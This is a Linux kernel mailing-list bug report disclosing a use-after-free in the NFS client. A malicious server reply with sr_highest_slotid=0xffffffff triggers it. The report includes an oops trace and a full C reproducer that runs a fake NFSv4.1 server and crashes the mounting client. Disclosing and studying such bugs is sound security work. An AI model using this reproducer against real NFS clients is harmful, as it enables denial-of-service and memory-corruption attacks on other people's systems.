public inbox for linux-nfs@vger.kernel.org
 help / color / mirror / Atom feed
From: rtm@csail.mit.edu
To: Trond Myklebust <trond.myklebust@hammerspace.com>,
	Anna Schumaker <anna.schumaker@netapp.com>
Cc: linux-nfs@vger.kernel.org
Subject: NFS client can use slot after it is kfree()ed
Date: Sun, 07 Nov 2021 04:57:15 -0500	[thread overview]
Message-ID: <33492.1636279035@crash.local> (raw)

[-- Attachment #1: Type: text/plain, Size: 2509 bytes --]

If the server returns sr_highest_slotid=0xffffffff in an OP_SEQUENCE
reply, nfs41_set_server_slotid_locked() will cause all the slots to be
kfree()ed, including the one that's in use. nfs41_release_slot() will
then dereference pointers extracted from the freed slot, and possibly
crash. 0xffffffff is special because highest_slotid + 1 wraps around to
0 in this call, which shrinks the slot table to zero slots:

        nfs4_shrink_slot_table(tbl, highest_slotid + 1);

I've attached a program that demonstrates the bug. My machine has
slub_debug=FZP.

# uname -a
Linux (none) 5.15.0-rc7-dirty #19 SMP Sat Nov 6 12:55:40 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
# cc nfs_3.c
# ./a.out
...
[   18.969075] Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b6b68
[   18.983273] Oops [#1]
[   18.988716] Modules linked in:
[   18.996151] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #16
[   19.008294] Hardware name: ucbbar,riscvemu-bare (DT)
[   19.017541] epc : nfs41_release_slot+0x20/0xc8
[   19.026918]  ra : nfs41_sequence_done+0x22/0x34
[   19.036245] epc : ffffffff802206ac ra : ffffffff80225a7a sp : ffffffd00057b7f0
...
[   19.183462] status: 0000000200000121 badaddr: 6b6b6b6b6b6b6b68 cause: 000000000000000d
[   19.198066] [<ffffffff802206ac>] nfs41_release_slot+0x20/0xc8
[   19.210683] [<ffffffff80225a7a>] nfs41_sequence_done+0x22/0x34
[   19.223249] [<ffffffff80226b5e>] nfs41_call_sync_done+0xe/0x16
[   19.235828] [<ffffffff8071a328>] rpc_exit_task+0x26/0x74
[   19.246807] [<ffffffff8071a4b0>] __rpc_execute+0x76/0x216
[   19.257785] [<ffffffff8071aace>] rpc_execute+0x58/0x7e
[   19.268764] [<ffffffff80713358>] rpc_run_task+0x12c/0x16c
[   19.279683] [<ffffffff80220a52>] nfs4_call_sync_custom+0x12/0x32
[   19.292304] [<ffffffff8022388a>] _nfs41_proc_secinfo_no_name.isra.0+0xca/0x13a
[   19.306944] [<ffffffff8022886c>] nfs41_find_root_sec+0xc6/0x228
[   19.319538] [<ffffffff8022bf2e>] nfs4_proc_get_rootfh+0x26/0x9a
[   19.332128] [<ffffffff80248396>] nfs4_get_rootfh+0x40/0xbc
[   19.343070] [<ffffffff80248a5a>] nfs4_server_common_setup+0x1ac/0x1be
[   19.356076] [<ffffffff802498e6>] nfs4_create_server+0x16c/0x208
[   19.368654] [<ffffffff8024161e>] nfs4_try_get_tree+0x16/0x4c
[   19.381247] [<ffffffff80218bac>] nfs_get_tree+0x34a/0x3ac
[   19.392176] [<ffffffff8012bce4>] vfs_get_tree+0x18/0x88
[   19.403092] [<ffffffff8014a28e>] path_mount+0x4f4/0x77a
[   19.414080] [<ffffffff8014a560>] do_mount+0x4c/0x7e
[   19.424644] [<ffffffff8014a912>] sys_mount+0xca/0x14e
[   19.435623] [<ffffffff80003046>] ret_from_syscall+0x0/0x2


[-- Attachment #2: nfs_3.c --]
[-- Type: application/octet-stream, Size: 7157 bytes --]

#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <unistd.h>

// Number of entries in the scripted-value table aa[].
#define NAA 64
// Values that parse_op_sequence() consumes three at a time and places into
// sr_slotid, sr_highest_slotid and sr_target_highest_slotid of each SEQUENCE
// reply. With this initializer the second SEQUENCE reply carries
// sr_highest_slotid = 0xffffffff; all later entries are zero.
unsigned long long aa[NAA] = { 0, 0, 0, 0, 0xffffffff, 0 };
// Index of the next unread entry of aa[].
int aai = 0;

// Body of the RPC record currently being parsed (filled by main()).
char ibuf[4096];
// Length in bytes of the record held in ibuf, as announced by the peer.
int ilen = 0;
// Read cursor into ibuf, advanced by the parse*() helpers.
int ii = 0;
// Reply under construction; main() stores the record marker in bytes 0..3.
char obuf[4096];
// Write cursor into obuf, advanced by the put*() helpers.
int oi = 0;

/*
 * Read exactly n bytes from fd into xbuf, looping over short reads.
 *
 * Returns n on success (immediately, if n <= 0). Returns -1 if read()
 * fails or if the stream ends before n bytes have arrived; a diagnostic is
 * written to stderr in both cases. A read interrupted by a signal (EINTR)
 * is retried rather than reported as a failure.
 */
int readn(int fd, void *xbuf, int n) {
  char *buf = (char *) xbuf;
  int orig = n;
  while(n > 0){
    ssize_t cc = read(fd, buf, n);
    if(cc < 0){
      if(errno == EINTR)
        continue;
      perror("read");
      return -1;
    }
    if(cc == 0){
      // End of file is not an error, so errno says nothing useful here.
      fprintf(stderr, "read: unexpected end of file\n");
      return -1;
    }
    n -= (int) cc;
    buf += cc;
  }
  return orig;
}

/*
 * Consume the next 4 bytes of ibuf as a big-endian (network order) 32-bit
 * word and return it in host byte order.
 *
 * If fewer than 4 unread bytes remain -- judged against both ilen and the
 * size of ibuf -- prints a diagnostic and returns 0 without advancing ii.
 */
unsigned int
parse32()
{
  // ilen comes from the peer; never let it describe more than ibuf holds.
  int limit = ilen < (int)sizeof(ibuf) ? ilen : (int)sizeof(ibuf);
  if(ii < 0 || ii > limit - 4){
    printf("parsed beyond the end of the input\n");
    return 0;
  }
  // memcpy instead of a cast: ibuf+ii is a char pointer with no alignment
  // guarantee, and reading it through an int lvalue breaks aliasing rules.
  unsigned int x = 0;
  memcpy(&x, ibuf + ii, 4);
  ii += 4;
  return ntohl(x);
}

/*
 * Consume two consecutive 32-bit words with parse32() and join them into
 * one 64-bit value; the first word read is the most significant half.
 */
unsigned long long
parse64()
{
  unsigned long long value = parse32();  // upper 32 bits arrive first
  value <<= 32;
  value |= parse32();                    // then the lower 32 bits
  return value;
}

// sessionid4 -- 16 bytes
void
parse_sid(char *sid)
{
  for(int i = 0; i < 16; i++){
    if(sid)
      sid[i] = ibuf[ii];
    ii++;
  }
}

unsigned int
parse_opaque(char *buf)
{
  if(buf)
    buf[0] = 0;
  int nominal_n = parse32();
  if(nominal_n > 4096){
    printf("crazy opaque length %d\n", nominal_n);
    return 0;
  }
  int real_n = nominal_n;
  while((real_n%4) != 0) real_n += 1;
  for(int i = 0; i < real_n; i++){
    if(buf)
      buf[i] = ibuf[ii];
    ii++;
  }
  if(buf)
    buf[nominal_n] = 0;
  return nominal_n;
}

/*
 * Append x to the reply in obuf as a big-endian (network order) 32-bit
 * word and advance oi by 4.
 *
 * If obuf has no room for another word, prints a diagnostic and leaves
 * obuf and oi unchanged instead of writing past the end of the buffer.
 */
void
put32(unsigned int x)
{
  assert((oi % 4) == 0);
  if(oi < 0 || oi > (int)sizeof(obuf) - 4){
    printf("reply does not fit in the output buffer\n");
    return;
  }
  // memcpy instead of storing through a cast int pointer into a char array.
  unsigned int wire = htonl(x);
  memcpy(obuf + oi, &wire, 4);
  oi += 4;
}

/*
 * Append a 64-bit value to the reply as two 32-bit words written with
 * put32(), most significant half first.
 */
void
put64(unsigned long long x)
{
  unsigned int upper = (unsigned int)(x >> 32);
  unsigned int lower = (unsigned int)x;
  put32(upper);
  put32(lower);
}

void
put_opaque(int n, char *buf)
{
  put32(n);
  for(int i = 0; i < n; i++)
    obuf[oi++] = buf[i];
  while((n%4)!=0){
    obuf[oi++] = 0;
    n++;
  }
}

void
put_sid(char *sid)
{
  for(int i = 0; i < 16; i++){
    obuf[oi++] = (sid ? sid[i] : 0);
  }
}

/*
 * Handler that parse_rpc() invokes for RPC procedure 0: it reads no
 * arguments and adds nothing to the reply.
 */
void
parse_nop()
{
  /* intentionally empty */
  return;
}

void
parse_op_exchange_id()
{
  parse32(); // verifier4, first half
  parse32(); // verifier4, second half
  parse_opaque(0); // eia_clientowner
  int cflags = parse32(); // eia_flags
  parse32(); // state_protect4_a.spa_how, assume SP4_NONE
  int nimpl = parse32(); // length of client_impl_id
  for(int impli = 0; impli < nimpl; impli++){
    char junk[512];
    parse_opaque(junk); // nii_domain
    // printf("nii_domain: %s\n", junk);
    parse_opaque(junk); // nii_name
    // printf("nii_name: %s\n", junk);
    parse64(); // 1/2 of nfstime4
    parse32(); // 1/2 of nfstime4
  }

  // finish EXCHANGE_ID4res
  put32(0); // eir_status = NFS4_OK
  put64(1); // clientid4
  put32(1); // sequenceid4
  int sflags = 0x103 | 0x10000; // EXCHGID4_FLAG_USE_NON_PNFS
  put32(sflags); // eir_flags
  put32(0); // state_protect4_r.spr_how = SP4_NONE
  put64(1); // server_owner4.so_minor_id
  put32(4); // length of so_major_id<>
  put32(0x11223344); // so_major_id<>
  put32(4); // length of eir_server_scope
  put32(0x11223344);
  put32(1); // length of eir_server_impl_id<1>
  put32(4); // nfs_impl_id4.nii_domain
  put32(0x11223344);
  put32(4); // nfs_impl_id4.nii_name
  put32(0x11223344);
  put64(0); // nii_date 1/2
  put32(0); // nii_date 2/2
}

/*
 * Handle a CREATE_SESSION operation. The client's sequence number and both
 * sets of channel attributes are read from the request and echoed back in
 * a successful result; everything else in the request is ignored.
 */
void
parse_op_create_session()
{
  enum { NCHAN = 2, NATTR = 6 };
  int chan_attrs[NCHAN][NATTR];

  parse64();                  // csa_clientid
  int sequence = parse32();   // csa_sequence
  parse32();                  // csa_flags

  // csa_fore_chan_attrs first, then csa_back_chan_attrs
  for(int c = 0; c < NCHAN; c++){
    int *slot = chan_attrs[c];
    for(int k = 0; k < NATTR; k++)
      slot[k] = parse32();
    parse_opaque(0);          // ca_rdma_ird<1>
  }

  put32(0);                   // OK
  int word = 0;
  while(word < 4){            // csr_sessionid, four words of 1
    put32(1);
    word++;
  }
  put32(sequence);            // csr_sequence
  put32(0x3);                 // csr_flags

  // hand each channel's attributes back unchanged
  for(int c = 0; c < NCHAN; c++){
    const int *slot = chan_attrs[c];
    for(int k = 0; k < NATTR; k++)
      put32(slot[k]);
    put32(0);                 // ca_rdma_ird
  }
}

void
parse_op_sequence()
{
  char sid[16];

  parse_sid(sid); // sa_sessionid
  int seq = parse32(); // sa_sequenceid
  int slotid = parse32(); // sa_slotid
  int hislot = parse32(); // sa_highest_slotid
  parse32(); // sa_cachethis

  put32(0); // OK
  put_sid(sid); // sr_sessionid
  put32(seq); // sr_sequenceid
  int x1 = aa[aai++];
  int x2 = aa[aai++];
  int x3 = aa[aai++];
  put32(x1); // sr_slotid
  put32(x2); // sr_highest_slotid
  put32(x3); // sr_target_highest_slotid
  put32(0); // sr_status_flags
}

void parse_compound()
{
  char tag[512];
  int taglen = parse_opaque(tag); // tag
  parse32(); // minor version
  int nops = parse32();
  printf("%d ops\n", nops);

  // start a COMPOUND4res
  put32(0); // nfsstat4 = NFS4_OK
  put_opaque(taglen, tag);
  put32(nops); // length of resarray<>
  
  for(int opindex = 0; opindex < nops && oi < ilen; opindex++){
    int op = parse32();
    printf("op %d\n", op);
    put32(op); // resop in nfs_resop4
    if(op == 42){
      parse_op_exchange_id();
    } else if(op == 43){
      parse_op_create_session();
    } else if(op == 53){
      parse_op_sequence();
    } else {
      printf("unknown op %d\n", op);
      // cannot continue to the next op since
      // we don't know how long this one is.
      break;
    }
  }
}

/*
 * Parse one SUN RPC call from ibuf and build the matching accepted reply
 * in obuf. The transaction id is echoed; credentials and verifier are
 * skipped. Procedure 0 goes to parse_nop(), procedure 1 to
 * parse_compound(); any other procedure is only reported.
 */
void
parse_rpc()
{
  // SUN RPC call header
  int xid = parse32();
  for(int skipped = 0; skipped < 4; skipped++)
    parse32();          // mtype=CALL, rpc version, prog#, prog vers
  int proc = parse32();
  parse32();            // cred type
  parse_opaque(0);      // cred
  parse32();            // verf type
  parse_opaque(0);      // verf

  // reply header
  put32(xid);
  put32(1);             // REPLY
  for(int zeros = 0; zeros < 4; zeros++)
    put32(0);           // MSG_ACCEPTED, AUTH_NULL flavor, auth length, SUCCESS

  switch(proc){
  case 0:
    parse_nop();
    break;
  case 1:
    parse_compound();
    break;
  default:
    printf("unknown rpc proc %d\n", proc);
    break;
  }
}

/*
 * Driver for the reproducer.
 *
 * Listens on TCP port 2049, then forks twice:
 *  - the first child runs mount (and, if that succeeds, ls/echo/umount)
 *    against 127.0.0.1;
 *  - the second child accepts one connection and answers each RPC record
 *    it receives with the reply built by parse_rpc().
 * The parent waits 7 seconds and then searches dmesg for 'unhandled sig'.
 *
 * A record whose announced length exceeds ibuf ends the serving loop
 * instead of being read past the end of the buffer.
 */
int
main(){
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  int s = socket(AF_INET, SOCK_STREAM, 0);
  if(s < 0){
    perror("socket"); exit(1);
  }
  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(2049);
  int yes = 1;
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("bind"); exit(1);
  }
  if(listen(s, 10) < 0){
    perror("listen"); exit(1);
  }

  int pid1 = fork();
  if(pid1 == 0){
    close(s);
    if(system("echo -n mount: ; mount 127.0.0.1:/tmp /mnt") == 0){
      system("echo -n ls: ; ls -l /mnt/. /mnt/z");
      system("echo -n echo: ; echo hi > /mnt/x");
      system("echo -n umount: ; umount /mnt");
    }
    exit(0);
  }

  int pid2 = fork();
  if(pid2 == 0){
    socklen_t sinlen = sizeof(sin);
    printf("calling accept\n");
    int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
    printf("accept returned %d\n", s1);
    if(s1 < 0) { perror("accept"); exit(1); }
    close(s);

    while(1){
      // Each record starts with a 4-byte marker: top bit is a flag,
      // the low 31 bits are the length of the data that follows.
      if(readn(s1, &ilen, 4) < 0) break;
      ilen = ntohl(ilen);
      ilen &= 0x7fffffff;
      // The length comes from the peer; refuse anything ibuf cannot hold.
      if(ilen > (int)sizeof(ibuf)){
        printf("record of %d bytes does not fit in the input buffer\n", ilen);
        break;
      }
      if(readn(s1, ibuf, ilen) < 0) break;
      oi = ii = 0;
      memset(obuf, 0, sizeof(obuf));
      put32(0); // place-holder for length
      parse_rpc();
      // Fill in the marker: reply length (excluding the marker itself)
      // with the top bit set.
      unsigned int marker = htonl((oi - 4) | 0x80000000);
      memcpy(obuf, &marker, 4);
      if(write(s1, obuf, oi)<=0) perror("write");
    }
    exit(1);
  }
  close(s);
  sleep(7);
  if(system("dmesg | grep 'unhandled sig'") == 0){
   // Deliberately never returns once the message has been seen
   // (NOTE(review): presumably so a harness can detect the hang -- confirm).
   printf("unhandled signal\n"); while(1){}
  }
  return 0;
}

                 reply	other threads:[~2021-11-07  9:57 UTC|newest]

Thread overview: [no followups] expand[flat|nested]  mbox.gz  Atom feed

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=33492.1636279035@crash.local \
    --to=rtm@csail.mit.edu \
    --cc=anna.schumaker@netapp.com \
    --cc=linux-nfs@vger.kernel.org \
    --cc=trond.myklebust@hammerspace.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox